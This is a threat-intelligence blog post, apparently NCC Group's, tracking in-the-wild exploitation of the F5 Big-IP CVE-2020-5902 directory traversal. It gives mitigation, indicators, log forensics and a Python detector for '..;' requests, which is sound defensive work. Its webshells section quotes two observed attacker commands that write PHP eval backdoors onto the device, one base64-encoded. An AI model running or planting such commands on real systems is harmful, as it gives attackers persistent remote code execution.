F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902 Intelligence
2020-07-07 23:24:48 Author: wiki.ioin.in (view original)

tl;dr

CVE-2020-5902 was disclosed on July 1st, 2020 by F5 Networks in K52145254 as a CVSS 10.0 remote code execution vulnerability in the Big-IP administrative interface. By July 3rd, 2020 NCC Group observed active exploitation. This blog is a summary of what we know as the situation develops.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IoCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

The Vulnerability / Patch

The vulnerability was discovered by Positive Technologies and an associated blog post released on July 2nd, 2020. NCC Group’s RIFT established a live post on Reddit on July 3rd to collate early intelligence and raise awareness within the cyber defence and sysadmin communities.

In the F5 knowledge base article K52145254 there is the following mitigation:

<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>

This regex matches any request path containing the sequence:

..;

As such the issue can be described as a directory traversal vulnerability. Combined with functionality native to the device, this traversal allows an unauthenticated attacker to read files, upload files and execute code.

Timeline of Events

[Figure: timeline of events]

Exploitation

The graph below shows the exploitation seen on NCC Group’s honeypot during the morning of July 5th, 2020.

[Graph: honeypot exploitation volume, morning of July 5th, 2020]

The graph below shows the exploitation seen on NCC Group’s honeypot during the morning of July 6th, 2020.

[Graph: honeypot exploitation volume, morning of July 6th, 2020]

Exploitation is varied, including access to password hashes:

As of Saturday, remote code execution capabilities existed.

The first IPs we observed actively exploiting the issue were published at 17:00 UTC on July 4th, 2020 – https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2020-5902

Shortly after these initial exploit attempts, exploit details were shared in open source.

Staged Exploitation

We have as of 10:00 on July 6th, 2020 started to see staged exploitation, namely a payload of:

The full payload is:

[Screenshot: full first-stage payload]

We have as of 10:29 on July 6th, 2020 started to see a second staged exploitation, namely:

[Screenshot: second staged exploitation request]

With a payload of:

[Screenshot: second-stage payload]

IoCs for the 2nd stage are:

b8ce500c1e6ec4d4268ae0d2de82f9f35bbfc673  /tmp/demo.txt

We have as of 16:17 on July 6th, 2020 started to see a third staged exploitation, namely:

e1775079d58a6266fdd6185143642ac53b4314fe  /var/log/F5-logcheck/zabbix

Another IoC for this actor is:

/tmp/cepi

Of note, this actor did their original scans on July 6th, 2020 at 10:30 and then returned roughly 6 hours later.

Webshells

As of 16:51 on July 6th, 2020 we’ve seen our first web shell:

mount -o remount -rw /usr ; echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2NpdHJpeEBraGFycGVkYXInXSkpOz8+ | /usr/bin/openssl base64 -d -out /usr/local/www/xui/common/images/bg_status.php

When decoded, it appears to be a web shell reused from Citrix exploitation:

<?php @eval(base64_decode($_POST['citrix@kharpedar']));?>

As of 09:26 on July 7th, 2020 we’ve seen a second web shell:

mount -o remount -rw /usr ;echo 'utility<?php @eval(base64_decode($_POST["session_sK4hodQm"]));' > /usr/local/www/xui/common/scripts/utility.php;mount -o remount -r /usr

New Exploit from Release to Use in < 12 Hours

As of 12:30 on July 7th, 2020 we’ve seen use of a new exploit.

Impact

As the devices are load balancers, they provide the opportunity to:

  • Acquire credentials
  • Acquire access to existing sessions through cookie theft
  • Acquire license keys
  • Perform traffic interception and modification
  • Pivot into the internal network
  • Acquire the private keys to any SSL/TLS certificates on the device

Incident Analysis

There are forensic artifacts available, although the log in which they are stored is limited to 20 MB and thus risks cycling quickly.

[Screenshot: journalctl log output example]

The wider HTTP log configuration differs from a default configuration.

#
# The location and format of the access logfile (Common Logfile Format).
# If you do not define any access logfiles within a <VirtualHost>
# container, they will be logged here.  Contrariwise, if you *do*
# define per-<VirtualHost> access logfiles, transactions will be
# logged therein and *not* in this file.
#
#CustomLog "logs/access_log" common
#
# If you prefer a logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.
#
CustomLog "/var/run/httpd.pipe" acc_combined

The configuration sends the access log to a pipe rather than a file. This pipe is consumed by syslog-ng and ultimately ends up in systemd/journalctl:

# grep httpd /etc/syslog-ng/syslog-ng_sysinit.conf.default
source s_httpd {
   pipe("/var/run/httpd.pipe" optional(yes) perm(0660) group("apache"));
destination d_httpd_err {
   file("/var/log/httpd/httpd_errors" create_dirs(yes));
   source(s_httpd);
   destination(d_httpd_err);

Other forensic artifacts include new .jsp files, or similar, created to achieve code execution.

Exploitation Detection

A Sigma rule has been created and is available here. However, using it requires the Big-IP logs to be sent to a SIEM, as passive network detection won’t work unless SSL/TLS can be decrypted.
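As an added example (not NCC Group’s code or the Sigma rule itself), the Python below applies the same `..;` match as the K52145254 LocationMatch mitigation to Apache combined-format access log lines, the kind that have to reach the SIEM for log-based detection to work. The log lines, the 203.0.113.x/198.51.100.x addresses and the PLACEHOLDER.jsp endpoint are constructed, and the percent-decoding step is an assumption added here.

```python
import re
from urllib.parse import unquote

# Same literal the K52145254 mitigation matches: <LocationMatch ".*\.\.;.*">
TRAVERSAL_RE = re.compile(r"\.\.;")

# Apache combined log format, as produced by the acc_combined CustomLog above:
# client ident user [time] "METHOD PATH PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def is_traversal(path: str) -> bool:
    """True if the request path contains "..;" either raw or percent-encoded.

    Checking the percent-decoded form as well is an assumption added here;
    it keeps an encoded ';' (%3B) from slipping past a log-side match.
    """
    return bool(TRAVERSAL_RE.search(path) or TRAVERSAL_RE.search(unquote(path)))


def suspicious_requests(lines):
    """Return (client, time, path, status) for each line whose path matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal(m["path"]):
            hits.append((m["client"], m["time"], m["path"], int(m["status"])))
    return hits


# Constructed sample log lines (not honeypot data); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges and PLACEHOLDER.jsp is not a real endpoint.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jul/2020:09:12:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120 "-" "curl/7.64.1"',
    '203.0.113.9 - - [05/Jul/2020:09:12:03 +0000] "GET /tmui/login.jsp/..;/tmui/PLACEHOLDER.jsp HTTP/1.1" 200 1830 "-" "python-requests/2.23.0"',
    '203.0.113.9 - - [05/Jul/2020:09:12:05 +0000] "GET /tmui/login.jsp/..%3B/tmui/PLACEHOLDER.jsp HTTP/1.1" 404 210 "-" "python-requests/2.23.0"',
    '198.51.100.4 - - [05/Jul/2020:09:13:10 +0000] "POST /tmui/login.jsp HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A 404 on a matching request is consistent with the `Redirect 404 /` mitigation being in place; a 200 on one indicates the request reached the application.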

Incident Support

Believe your organisation may have been compromised? Contact us on [email protected]

Change Log

July 7th, 2020 @ 13:15 – v1.15 – added new exploit
July 7th, 2020 @ 09:26 – v1.14 – added the second web shell
July 6th, 2020 @ 17:09 – v1.13 – added the first web shell
July 6th, 2020 @ 16:40 – v1.12 – added another staged payload
July 6th, 2020 @ 13:13 – v1.11 – added detection aspects and session cookie theft
July 6th, 2020 @ 10:21 – v1.10 – added staged payload
July 6th, 2020 @ 09:48 – v1.9 – added Honeypot attack volumes from this morning
July 6th, 2020 @ 09:34 – v1.8 – added fact Metasploit exploitation seen in the wild
July 6th, 2020 @ 09:00 – v1.7 – added timeline of events
July 6th, 2020 @ 05:46 – v1.6 – added Metasploit modules and other public exploits released overnight
July 5th, 2020 @ 21:22 – v1.5 – added license key theft based on honeypot data
July 5th, 2020 @ 17:34 – v1.4 – included link to fully functional exploit being shared
July 5th, 2020 @ 16:28 – v1.3 – Further clarification on log pipe consumption
July 5th, 2020 @ 16:23 – v1.2 – New journalctl output example
July 5th, 2020 @ 16:16 – v1.1 – Clarified log pipe usage
July 5th, 2020 @ 15:40 – v1.0 – Initial version

Published by RIFT: Research and Intelligence Fusion Team

Source: https://wiki.ioin.in/url/akR9